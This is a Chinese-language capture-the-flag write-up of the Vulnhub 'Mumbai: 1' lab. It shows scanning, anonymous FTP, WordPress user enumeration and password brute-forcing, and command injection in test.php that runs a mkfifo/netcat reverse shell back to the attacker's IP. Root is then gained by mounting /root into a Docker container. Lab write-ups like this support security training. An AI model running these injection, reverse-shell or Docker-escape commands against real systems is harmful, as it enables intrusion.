Vulnhub之Mumbai靶机详细测试过程

Mumbai

作者:jason huawen

靶机信息

名称: Mumbai: 1

地址:

https://www.vulnhub.com/entry/mumbai-1,372/

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:ff:33:41      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.243  08:00:27:50:a1:19      1      60  PCS Systemtechnik GmbH                      

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.243

NMAP扫描

──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.243 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-04 02:45 EDT
Nmap scan report for bogon (192.168.56.243)
Host is up (0.00012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.230
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             297 Sep 25  2019 Note
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:df:27:19:33:de:d4:2e:5e:33:d9:ab:74:df:38:80 (RSA)
|   256 29:e2:b6:ef:b3:a0:43:7b:8a:a4:4b:f7:e8:41:1f:5b (ECDSA)
|_  256 34:3a:48:af:b8:68:ab:53:18:62:d2:e4:08:74:e4:c3 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: comingsoonpage.com 1.0.0
|_http-title: Mumbai SEO Services
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open  mysql   MySQL (unauthorized)
8000/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.0 (Ubuntu)
MAC Address: 08:00:27:50:A1:19 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

获得Shell

先尝试一下mysql是否有弱口令:

─(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ mysql -uroot -p -h 192.168.56.243
Enter password: 
ERROR 1130 (HY000): Host '192.168.56.230' is not allowed to connect to this MySQL server

尝试结果表明远程机器无法连接数据库服务器,只允许本地访问。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ ftp 192.168.56.243                   
Connected to 192.168.56.243.
220 (vsFTPd 3.0.3)
Name (192.168.56.243:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||14114|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        116          4096 Sep 25  2019 .
drwxr-xr-x    2 0        116          4096 Sep 25  2019 ..
-rw-r--r--    1 0        0             297 Sep 25  2019 Note
226 Directory send OK.
ftp> get Note
local: Note remote: Note
229 Entering Extended Passive Mode (|||55304|)
150 Opening BINARY mode data connection for Note (297 bytes).
100% |****************************************************************************************************************|   297      108.30 KiB/s    00:00 ETA
226 Transfer complete.
297 bytes received in 00:00 (77.90 KiB/s)
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||34115|)
550 Permission denied.

对FTP服务的信息收集结果汇总:

  1. 目标主机允许FTP匿名访问

  2. 将Note下载到Kali Linux本地

  3. 匿名用户无法上传文件

  4. ftp服务版本无漏洞可利用。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ cat Note  
TODO:

Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
secure - maybe this will shut those security researchers up.

Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
rebuild the server again.

- AbsoZed

从Note内容看,应该是有容器的环境,也许可以利用容器进行本地提权。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ gobuster dir -u http://192.168.56.243 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.243
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2023/04/04 02:52:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10243]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.243/wordpress/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.243/javascript/]
/drupal               (Status: 301) [Size: 317] [--> http://192.168.56.243/drupal/]
/SEO                  (Status: 301) [Size: 314] [--> http://192.168.56.243/SEO/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1320475 / 1323366 (99.78%)
===============================================================
2023/04/04 02:55:29 Finished
===============================================================

Gobuster工具扫描出/drupaly以及/wordpress目录,前者为空目录,/wordpress目录应该是下一步信息收集的重点,利用的工具是wpscan:

──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ wpscan --url http://192.168.56.243/wordpress -e u,p 
[i] User(s) Identified:

[+] absozed
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
        
─$ wpscan --url http://192.168.56.243/wordpress -U absozed -P /usr/share/wordlists/rockyou.txt 

虽然wpscan工具扫描出用户名,但是在尝试利用wpscan工具破解密码时但运行十几分钟没有破解出密码。而且wpscan也没有扫描出可利用的插件,因此80端口方向只能作罢。

接下来看8000端口:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ gobuster dir -u http://192.168.56.243:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.js,.txt,.html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.243:8000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              html,php,sh,js,txt
[+] Timeout:                 10s
===============================================================
2023/04/04 03:30:30 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 46]
/test.php             (Status: 200) [Size: 64]

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ curl http://192.168.56.243:8000/test.php
Please POST a proper query. ex: https://caffeinatedengineers.com     

从返回的内容来看,说明请求方法需要修改为POST,可以用burpsuite工具拦截请求,从而修改请求方法,即修改GET为POST

注意不要直接在Burp左侧修改请求头和请求体,修改结果其实是无效的,而是用右边的burpsuite来设置,比如修改Request mehod, 增加request body等等,因为在右侧修改内容,Burpsuite会做自动的字段补充,比如content-type等

也就是说可以利用命令包含漏洞,执行命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f

这样Kali Linux得到目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.243] 40510
which python
/usr/local/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
apiuser@mumbai:~$ 

提权

apiuser@mumbai:~$ docker images
docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
migrationtest       v1                  ec8b7840f6aa        3 years ago         216MB
ubuntu              14.04               2c5e00d77a67        3 years ago         188MB
apiuser@mumbai:~$ docker run -it -v /root:/mnt ubuntu
docker run -it -v /root:/mnt ubuntu
Unable to find image 'ubuntu:latest' locally
docker: Error response from daemon: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.io: Temporary failure in name resolution.
See 'docker run --help'.
apiuser@mumbai:~$ docker run -it -v /root:/mnt ubuntu:14.04
docker run -it -v /root:/mnt ubuntu:14.04
root@224ee0f52adc:/# cd /mnt
cd /mnt
root@224ee0f52adc:/mnt# ls -alh
ls -alh
total 68K
drwx------   6 root root 4.0K Sep 25  2019 .
drwxr-xr-x   1 root root 4.0K Apr  4 07:54 ..
-rw-r--r--   1 root root 3.1K Apr  9  2018 .bashrc
drwx------   3 root root 4.0K Sep 24  2019 .cache
drwxr-xr-x   3 root root 4.0K Sep 24  2019 .local
-rw-------   1 root root   74 Sep 24  2019 .mysql_history
drwxr-xr-x 399 1000 1000  12K Sep 24  2019 .npm
-rw-r--r--   1 root root  148 Aug 17  2015 .profile
-rw-------   1 root root    7 Sep 24  2019 .python_history
drwx------   2 root root 4.0K Sep 24  2019 .ssh
-rw-r--r--   1 root root 9.2K Sep 24  2019 .v8flags.6.2.414.50.root.json
-rw-r--r--   1 root root  174 Sep 24  2019 .wget-hsts
-rw-r--r--   1 root root  603 Sep 25  2019 proof.txt
root@224ee0f52adc:/mnt# cat proof.txt
cat proof.txt


8""8""8                                  8""""8 8"""" 8"""88 
8  8  8 e   e eeeeeee eeeee  eeeee e     8      8     8    8 
8e 8  8 8   8 8  8  8 8   8  8   8 8     8eeeee 8eeee 8    8 
88 8  8 8e  8 8e 8  8 8eee8e 8eee8 8e        88 88    8    8 
88 8  8 88  8 88 8  8 88   8 88  8 88    e   88 88    8    8 
88 8  8 88ee8 88 8  8 88eee8 88  8 88    8eee88 88eee 8eeee8 
                                                             
By: AbsoZed

                                                                                                                         
Congratulations! Hope you enjoyed the box!

Proof: 4370445fbc9eaa490589b55a8ae4494f

https://caffeinatedengineers.com

root@224ee0f52adc:/mnt# 

热门相关:老子是癞蛤蟆   天启预报   仗剑高歌   天启预报   第一神算:纨绔大小姐